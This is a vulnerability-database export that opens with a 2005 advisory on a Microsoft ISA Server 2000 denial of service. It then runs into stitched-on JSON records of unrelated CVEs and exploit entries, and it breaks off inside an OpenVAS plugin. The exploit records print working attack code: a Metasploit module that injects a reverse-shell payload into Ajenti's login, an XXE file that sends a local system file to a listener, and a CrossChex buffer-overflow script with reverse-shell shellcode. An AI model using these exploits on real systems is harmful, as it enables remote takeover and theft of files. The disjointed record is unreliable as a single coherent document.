ID SECURITYVULNS:DOC:8780 Type securityvulns Reporter Securityvulns Modified 2005-06-02T00:00:00
Description
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam
web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
Microsoft ISA Server 2000 DoS
SUMMARY
" <http://www.microsoft.com/isaserver/default.mspx> Microsoft Internet
Security and Acceleration (ISA) Server is the advanced stateful packet and
application-layer inspection firewall, virtual private network (VPN), and
Web cache solution that enables enterprise customers to easily maximize
existing information technology (IT) investments by improving network
security and performance."
Microsoft Internet Security and Acceleration Server's Firewall crashes
when heavy network traffic is received from a SecureNAT client.
DETAILS
Vulnerable Systems:
* SA Server 2000 and ISA Server 2000 Service Pack 2 (SP2) Wspsrv.exe
version 3.0.1200.411 and prior
Workaround:
Limit the size of traffic being handled by the ISA server for each
SecureNAT client contacting it.
Disclosure Timeline:
01-06-2005 - Vulnerability researched
02-06-2005 - Security companies and several CERT units contacted, advisory
published, link to advisory sent to security companies and several CERT
units
ADDITIONAL INFORMATION
The information has been provided by <mailto:juha-matti.laurio@netti.fi>
Juha-Matti Laurio .
The original article can be found at:
<http://www.networksecurity.fi/advisories/windows-isa-firewall.html>
http://www.networksecurity.fi/advisories/windows-isa-firewall.html
The vendor advisory can be found at :
<http://support.microsoft.com/kb/894864/EN-US/>
http://support.microsoft.com/kb/894864/EN-US/
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages.
{"id": "SECURITYVULNS:DOC:8780", "bulletinFamily": "software", "title": "[NT] Microsoft ISA Server 2000 DoS", "description": "The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam\r\nweb site: http://www.securiteam.com\r\n- - promotion\r\n\r\nThe SecuriTeam alerts list - Free, Accurate, Independent.\r\n\r\nGet your security news from a reliable source.\r\nhttp://www.securiteam.com/mailinglist.html \r\n\r\n- - - - - - - - -\r\n\r\n\r\n\r\n Microsoft ISA Server 2000 DoS\r\n------------------------------------------------------------------------\r\n\r\n\r\nSUMMARY\r\n\r\n" <http://www.microsoft.com/isaserver/default.mspx> Microsoft Internet \r\nSecurity and Acceleration (ISA) Server is the advanced stateful packet and \r\napplication-layer inspection firewall, virtual private network (VPN), and \r\nWeb cache solution that enables enterprise customers to easily maximize \r\nexisting information technology (IT) investments by improving network \r\nsecurity and performance."\r\n\r\nMicrosoft Internet Security and Acceleration Server's Firewall crashes \r\nwhen heavy network traffic is received from a SecureNAT client.\r\n\r\nDETAILS\r\n\r\nVulnerable Systems:\r\n * SA Server 2000 and ISA Server 2000 Service Pack 2 (SP2) Wspsrv.exe \r\nversion 3.0.1200.411 and prior\r\n\r\nWorkaround:\r\nLimit the size of traffic being handled by the ISA server for each \r\nSecureNAT client contacting it.\r\n\r\nDisclosure Timeline:\r\n01-06-2005 - Vulnerability researched\r\n02-06-2005 - Security companies and several CERT units contacted, advisory \r\npublished, link to advisory sent to security companies and several CERT \r\nunits\r\n\r\n\r\nADDITIONAL INFORMATION\r\n\r\nThe information has been provided by <mailto:juha-matti.laurio@netti.fi> \r\nJuha-Matti Laurio .\r\nThe original article can be found at: \r\n<http://www.networksecurity.fi/advisories/windows-isa-firewall.html> \r\nhttp://www.networksecurity.fi/advisories/windows-isa-firewall.html\r\nThe vendor advisory can be found at : \r\n<http://support.microsoft.com/kb/894864/EN-US/> \r\nhttp://support.microsoft.com/kb/894864/EN-US/\r\n\r\n\r\n\r\n======================================== \r\n\r\n\r\nThis bulletin is sent to members of the SecuriTeam mailing list. \r\nTo unsubscribe from the list, send mail with an empty subject line and body to:\r\nlist-unsubscribe@securiteam.com \r\nIn order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com \r\n\r\n\r\n==================== \r\n==================== \r\n\r\nDISCLAIMER: \r\nThe information in this bulletin is provided "AS IS" without warranty of any kind. \r\nIn no event shall we be liable for any damages whatsoever including direct, indirect, incidental,\r\nconsequential, loss of business profits or special damages. \r\n\r\n\r\n\r\n", "published": "2005-06-02T00:00:00", "modified": "2005-06-02T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8780", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:13", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "5796ddaccf2a8c0204642bf67271bbc4"}, {"key": "href", "hash": "df319f044890fc62f882b1c3373c0f4d"}, {"key": "modified", "hash": "b327abb31fdd31486f08cee3d1cb858c"}, {"key": "published", "hash": "b327abb31fdd31486f08cee3d1cb858c"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "a8eb5a28e256ca9b7e2e516bf3637ebb"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "8883bf1274e24db40bb19c29c7a9a086c4763e4cd08f8945b427bf9c424ed27b", "viewCount": 0, "enchantments": {"score": {"value": 2.9, "vector": "NONE", "modified": "2018-08-31T11:10:13"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310852529", "OPENVAS:1361412562310852527"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1485-1", "OPENSUSE-SU-2019:1481-1", "OPENSUSE-SU-2019:1479-1"]}, {"type": "ubuntu", "idList": ["USN-3996-1"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994293"]}, {"type": "zdt", "idList": ["1337DAY-ID-32799", "1337DAY-ID-32772", "1337DAY-ID-32775", "1337DAY-ID-32771", "1337DAY-ID-32767", "1337DAY-ID-32754", "1337DAY-ID-32753", "1337DAY-ID-32757", "1337DAY-ID-32725", "1337DAY-ID-32724"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152997"]}, {"type": "kitploit", "idList": ["KITPLOIT:3928947731225997712"]}], "modified": "2018-08-31T11:10:13"}, "vulnersScore": 2.9}, "objectVersion": "1.3", "affectedSoftware": []}
{"cve": [{"lastseen": "2019-12-12T12:58:17", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Zabbix 1.8.x before 1.8.18rc1, 2.0.x before 2.0.9rc1, and 2.1.x before 2.1.7.", "modified": "2019-12-11T21:14:00", "id": "CVE-2013-5743", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5743", "published": "2019-12-11T19:15:00", "title": "CVE-2013-5743", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:15", "bulletinFamily": "NVD", "description": "includes/libs/IEUrlExtension.php in the MediaWiki API in MediaWiki 1.19.x before 1.19.8, 1.20.x before 1.20.7, and 1.21.x before 1.21.2 does not properly detect extensions when there are an even number of \".\" (period) characters in a string, which allows remote attackers to conduct cross-site scripting (XSS) attacks via the siprop parameter in a query action to wiki/api.php.", "modified": "2019-12-11T21:14:00", "id": "CVE-2013-4303", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4303", "published": "2019-12-11T19:15:00", "title": "CVE-2013-4303", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:17", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in products.php in the Cart66 Lite plugin before 1.5.1.15 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) Product name or (2) Price description fields via a request to wp-admin/admin.php. NOTE: This issue may only cross privilege boundaries if used in combination with CVE-2013-5977.", "modified": "2019-12-11T21:14:00", "id": "CVE-2013-5978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5978", "published": "2019-12-11T19:15:00", "title": "CVE-2013-5978", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:19", "bulletinFamily": "NVD", "description": "node-connects before 2.8.2 has cross site scripting in Sencha Labs Connect middleware (vulnerability due to incomplete fix for CVE-2013-7370)", "modified": "2019-12-11T16:05:00", "id": "CVE-2013-7371", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7371", "published": "2019-12-11T15:15:00", "title": "CVE-2013-7371", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-12T12:58:19", "bulletinFamily": "NVD", "description": "node-connect before 2.8.1 has XSS in the Sencha Labs Connect middleware", "modified": "2019-12-11T15:15:00", "id": "CVE-2013-7370", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7370", "published": "2019-12-11T14:15:00", "title": "CVE-2013-7370", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:57:12", "bulletinFamily": "NVD", "description": "mod_wsgi module before 3.4 for Apache, when used in embedded mode, might allow remote attackers to obtain sensitive information via the Content-Type header which is generated from memory that may have been freed and then overwritten by a separate thread.", "modified": "2019-12-10T02:13:00", "id": "CVE-2014-0242", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0242", "published": "2019-12-09T20:15:00", "title": "CVE-2014-0242", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:54:55", "bulletinFamily": "NVD", "description": "chrony before 1.31.1 does not properly protect state variables in authenticated symmetric NTP associations, which allows remote attackers with knowledge of NTP peering to cause a denial of service (inability to synchronize) via random timestamps in crafted NTP data packets.", "modified": "2019-12-09T19:22:00", "id": "CVE-2015-1853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1853", "published": "2019-12-09T19:15:00", "title": "CVE-2015-1853", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-12-11T14:58:34", "bulletinFamily": "NVD", "description": "An SQL Injection vulnerability exists in MiniDLNA prior to 1.1.0", "modified": "2019-12-10T15:47:00", "id": "CVE-2013-2745", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2745", "published": "2019-12-04T22:15:00", "title": "CVE-2013-2745", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-12T12:56:55", "bulletinFamily": "NVD", "description": "FreeBSD: Input Validation Flaw allows local users to gain elevated privileges", "modified": "2019-12-11T16:04:00", "id": "CVE-2012-4576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4576", "published": "2019-12-02T18:15:00", "title": "CVE-2012-4576", "type": "cve", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-12T12:55:38", "bulletinFamily": "NVD", "description": "Path traversal vulnerability in Docker before 1.3.3 allows remote attackers to write to arbitrary files and bypass a container protection mechanism via a full pathname in a symlink in an (1) image or (2) build in a Dockerfile.", "modified": "2019-12-11T20:30:00", "id": "CVE-2014-9356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9356", "published": "2019-12-02T18:15:00", "title": "CVE-2014-9356", "type": "cve", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:P"}}], "zdt": [{"lastseen": "2019-12-04T16:04:29", "bulletinFamily": "exploit", "description": "This Metasploit module exploits a command injection in Ajenti version 2.1.31. By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.", "modified": "2019-12-03T00:00:00", "published": "2019-12-03T00:00:00", "id": "1337DAY-ID-33620", "href": "https://0day.today/exploit/description/33620", "title": "Ajenti 2.1.31 Command Injection Exploit", "type": "zdt", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ajenti auth username Command Injection',\r\n 'Description' => %q{\r\n This module exploits a command injection in Ajenti == 2.1.31.\r\n By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.\r\n },\r\n 'Author' => [\r\n 'Jeremy Brown', # Vulnerability discovery\r\n 'Onur ER <[email\u00a0protected]>' # Metasploit module\r\n ],\r\n 'References' => [\r\n ['EDB', '47497']\r\n ],\r\n 'DisclosureDate' => '2019-10-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'python',\r\n 'Arch' => ARCH_PYTHON,\r\n 'Privileged' => false,\r\n 'Targets' => [\r\n ['Ajenti == 2.1.31', {}]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8000,\r\n 'SSL' => true,\r\n 'payload' => 'python/meterpreter/reverse_tcp'\r\n },\r\n 'DefaultTarget' => 0\r\n ))\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Base path', '/'])\r\n ])\r\n end\r\n\r\n def check\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => '/view/login/normal'\r\n })\r\n\r\n unless res\r\n vprint_error 'Connection failed'\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.body =~ /ajenti/i\r\n return CheckCode::Safe\r\n end\r\n\r\n version = res.body.scan(/'ajentiVersion', '([\\d\\.]+)'/).flatten.first\r\n\r\n if version\r\n vprint_status \"Ajenti version #{version}\"\r\n end\r\n\r\n if version == '2.1.31'\r\n return CheckCode::Appears\r\n end\r\n\r\n CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n print_status('Exploiting...')\r\n json_body = { 'username' => \"`python -c \\\"#{payload.encoded}\\\"`\",\r\n 'password' => rand_text_alpha_lower(7),\r\n 'mode' => 'normal'\r\n }\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri, 'api', 'core', 'auth'),\r\n 'ctype' => 'application/json',\r\n 'data' => JSON.generate(json_body)\r\n })\r\n end\r\nend\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33620"}, {"lastseen": "2019-12-04T14:10:38", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33612", "href": "https://0day.today/exploit/description/33612", "title": "Visual Studio 2008 - XML External Entity Injection Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Visual Studio 2008 - XML External Entity Injection\r\n# Discovery by: hyp3rlinx\r\n# Date: 2019-12-02\r\n# Vendor Homepage: www.microsoft.com\r\n# Software Link: Visual Studio 2008 Express IDE \r\n# Tested Version: 2008\r\n# CVE: N/A\r\n\r\n[+] Credits: John Page (aka hyp3rlinx)\t\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt\r\n[+] ISR: ApparitionSec \r\n\r\n\r\n[Vendor]\r\nwww.microsoft.com\r\n\r\n\r\n[Product]\r\nVisual Studio 2008 Express IDE \r\nvcsetup.exe\r\nFile hash: 62f764849e8fcdf8bfbc342685641304\r\nDownload: http://go.microsoft.com/?linkid=7729279\r\n\r\n\r\n[Vulnerability Type]\r\nXML External Entity Injection 0Day\r\n\r\n\r\n[CVE Reference]\r\nN/A\r\n\r\n\r\n[Security Issue]\r\nVisual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst.\r\nBy opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the\r\nremote attackers server. \r\n\r\nDouble click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get \r\nassociated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit.\r\n\r\n[Vuln XXE file types]\r\n.snippet\r\n.i\r\n.s\r\n.asm\r\n.disco\r\n.lst\r\n.inc\r\n.srf\r\n.wsdl\r\n.rgs\r\n.xml\r\n\r\nThis IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory.\r\n\r\n\r\n[References]\r\nhttps://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/\r\n\r\n\r\n[Exploit/POC]\r\n\"Evil.snippet\" or any of the extensions mentioned above.\r\n\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE knobgobslob [ \r\n<!ENTITY % file SYSTEM \"C:\\Windows\\system.ini\">\r\n<!ENTITY % dtd SYSTEM \"http://127.0.0.1:8000/payload.dtd\">\r\n%dtd;]>\r\n<pwn>&send;</pwn>\r\n\r\n\r\n\"payload.dtd\"\r\n\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!ENTITY % all \"<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>\">\r\n%all;\r\n\r\n\r\npython -m SimpleHTTPServer\r\npython -m http.server (Python3)\r\n\r\n\r\n[POC Video URL]\r\nhttps://www.youtube.com/watch?v=QOZlwzsbPrk\r\n\r\n\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33612"}, {"lastseen": "2019-12-04T02:04:32", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2019-12-02T00:00:00", "published": "2019-12-02T00:00:00", "id": "1337DAY-ID-33614", "href": "https://0day.today/exploit/description/33614", "title": "Anviz CrossChex 4.3.12 - Local Buffer Overflow Exploit", "type": "zdt", "sourceData": "# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow\r\n# Exploit Author: Luis Catarino & Pedro Rodrigues\r\n# Vendor Homepage: https://www.anviz.com/\r\n# Software Link: https://www.anviz.com/download.html\r\n# Version: Crosschex Standard x86 <= V4.3.12\r\n# Tested on: 4.3.8.0, 4.3.12\r\n# CVE : N/A\r\n# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html\r\n\r\nimport socket\r\nimport time\r\nimport sys\r\nimport binascii\r\n\r\n# Scapy for the broadcast packet with custom sport\r\nfrom scapy.all import Raw,IP,Dot1Q,UDP,Ether\r\nimport scapy.all\r\n\r\n# shellcode working calc.exe\r\ncalculator_payload = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\ncalculator_payload += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\ncalculator_payload += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\ncalculator_payload += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\ncalculator_payload += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\ncalculator_payload += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\ncalculator_payload += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\ncalculator_payload += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\ncalculator_payload += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\ncalculator_payload += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\ncalculator_payload += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x6a\\x01\\x8d\\x85\\xb2\\x00\"\r\ncalculator_payload += b\"\\x00\\x00\\x50\\x68\\x31\\x8b\\x6f\\x87\\xff\\xd5\\xbb\\xf0\\xb5\"\r\ncalculator_payload += b\"\\xa2\\x56\\x68\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\"\r\ncalculator_payload += b\"\\x80\\xfb\\xe0\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\"\r\ncalculator_payload += b\"\\xff\\xd5\\x63\\x61\\x6c\\x63\\x2e\\x65\\x78\\x65\\x00\"\r\n\r\n# shellcode windows x86 reverse_shell\r\nshell_payload_1 = b\"\\xfc\\xe8\\x82\\x00\\x00\\x00\\x60\\x89\\xe5\\x31\\xc0\\x64\\x8b\"\r\nshell_payload_1 += b\"\\x50\\x30\\x8b\\x52\\x0c\\x8b\\x52\\x14\\x8b\\x72\\x28\\x0f\\xb7\"\r\nshell_payload_1 += b\"\\x4a\\x26\\x31\\xff\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\xc1\\xcf\"\r\nshell_payload_1 += b\"\\x0d\\x01\\xc7\\xe2\\xf2\\x52\\x57\\x8b\\x52\\x10\\x8b\\x4a\\x3c\"\r\nshell_payload_1 += b\"\\x8b\\x4c\\x11\\x78\\xe3\\x48\\x01\\xd1\\x51\\x8b\\x59\\x20\\x01\"\r\nshell_payload_1 += b\"\\xd3\\x8b\\x49\\x18\\xe3\\x3a\\x49\\x8b\\x34\\x8b\\x01\\xd6\\x31\"\r\nshell_payload_1 += b\"\\xff\\xac\\xc1\\xcf\\x0d\\x01\\xc7\\x38\\xe0\\x75\\xf6\\x03\\x7d\"\r\nshell_payload_1 += b\"\\xf8\\x3b\\x7d\\x24\\x75\\xe4\\x58\\x8b\\x58\\x24\\x01\\xd3\\x66\"\r\nshell_payload_1 += b\"\\x8b\\x0c\\x4b\\x8b\\x58\\x1c\\x01\\xd3\\x8b\\x04\\x8b\\x01\\xd0\"\r\nshell_payload_1 += b\"\\x89\\x44\\x24\\x24\\x5b\\x5b\\x61\\x59\\x5a\\x51\\xff\\xe0\\x5f\"\r\nshell_payload_1 += b\"\\x5f\\x5a\\x8b\\x12\\xeb\\x8d\\x5d\\x68\\x33\\x32\\x00\\x00\\x68\"\r\nshell_payload_1 += b\"\\x77\\x73\\x32\\x5f\\x54\\x68\\x4c\\x77\\x26\\x07\\xff\\xd5\\xb8\"\r\nshell_payload_1 += b\"\\x90\\x01\\x00\\x00\\x29\\xc4\\x54\\x50\\x68\\x29\\x80\\x6b\\x00\"\r\nshell_payload_1 += b\"\\xff\\xd5\\x50\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\x68\\xea\\x0f\"\r\nshell_payload_1 += b\"\\xdf\\xe0\\xff\\xd5\\x97\\x6a\\x05\\x68\"\r\n\r\n# shellcode windows x86 reverse_shell (part_2)\r\nshell_payload_2 = b\"\\x68\\x02\\x00\\x01\\xbd\\x89\\xe6\\x6a\\x10\\x56\\x57\\x68\\x99\\xa5\"\r\nshell_payload_2 += b\"\\x74\\x61\\xff\\xd5\\x85\\xc0\\x74\\x0c\\xff\\x4e\\x08\\x75\\xec\"\r\nshell_payload_2 += b\"\\x68\\xf0\\xb5\\xa2\\x56\\xff\\xd5\\x68\\x63\\x6d\\x64\\x00\\x89\"\r\nshell_payload_2 += b\"\\xe3\\x57\\x57\\x57\\x31\\xf6\\x6a\\x12\\x59\\x56\\xe2\\xfd\\x66\"\r\nshell_payload_2 += b\"\\xc7\\x44\\x24\\x3c\\x01\\x01\\x8d\\x44\\x24\\x10\\xc6\\x00\\x44\"\r\nshell_payload_2 += b\"\\x54\\x50\\x56\\x56\\x56\\x46\\x56\\x4e\\x56\\x56\\x53\\x56\\x68\"\r\nshell_payload_2 += b\"\\x79\\xcc\\x3f\\x86\\xff\\xd5\\x89\\xe0\\x4e\\x56\\x46\\xff\\x30\"\r\nshell_payload_2 += b\"\\x68\\x08\\x87\\x1d\\x60\\xff\\xd5\\xbb\\xf0\\xb5\\xa2\\x56\\x68\"\r\nshell_payload_2 += b\"\\xa6\\x95\\xbd\\x9d\\xff\\xd5\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\nshell_payload_2 += b\"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x53\\xff\\xd5\"\r\n\r\ndef ipToShellcode(ip):\r\n a = ip.split('.')\r\n b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3]))\r\n b = b.replace(\"0x\",\"\")\r\n return binascii.unhexlify(b)\r\n\r\n# sport has to be 5060\r\ndef sendFuzzingUDPBroadcast(ip=\"255.255.255.255\", sport=5050, dport=5060):\r\n request = b\"A\"*77 # Original payload substitute\r\n request += b\"B\"*184\r\n request += b\"\\x07\\x18\\x42\\x00\" # EIP - 00421807 crosscheck_standard.exe\r\n request += b\"A\"*4\r\n # 269 bytes\r\n\r\n if len(sys.argv) > 2:\r\n request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2\r\n else:\r\n request = request + calculator_payload\r\n\r\n scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst=\"ff:ff:ff:ff:ff:ff\")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] )\r\n\r\ndef setFuzzUDPServer(ip='', port=5050, timeout=150):\r\n try :\r\n \ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n except:\r\n \tprint('[!] Failed to create server socket')\r\n\r\n try:\r\n \ts.bind(('', port))\r\n except:\r\n \tprint('[*] Server socket bind failed')\r\n \tsys.exit()\r\n\r\n print('[*] Waiting for crosschex')\r\n s.settimeout(timeout)\r\n timeout = time.time() + timeout\r\n responses = []\r\n\r\n while True:\r\n if time.time() > timeout:\r\n break\r\n try:\r\n response = s.recvfrom(1024)\r\n print(response)\r\n responses.append(response)\r\n sendFuzzingUDPBroadcast(ip=ip)\r\n response = s.recvfrom(1024) \r\n except socket.timeout:\r\n print(\"[!] Error with UDP server\")\r\n\r\n s.close()\r\n return responses\r\n\r\nnargs = len(sys.argv)\r\n\r\nif nargs < 2:\r\n print(\"[*] Usage: python3 %s <network_interface> [<ip>]\\n\\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445\")\r\n sys.exit(0)\r\n\r\nsetFuzzUDPServer()\n\n# 0day.today [2019-12-03] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33614"}], "openvas": [{"lastseen": "2019-12-04T15:52:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-11-30T00:00:00", "published": "2019-11-30T00:00:00", "id": "OPENVAS:1361412562310892014", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892014", "title": "Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892014\");\n script_version(\"2019-11-30T03:00:09+0000\");\n script_cve_id(\"CVE-2014-6053\", \"CVE-2018-7225\", \"CVE-2019-15681\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-11-30 03:00:09 +0000 (Sat, 30 Nov 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 2014-1] vino security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/11/msg00032.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-2014-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/945784\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'vino'\n package(s) announced via the DSA-2014-1 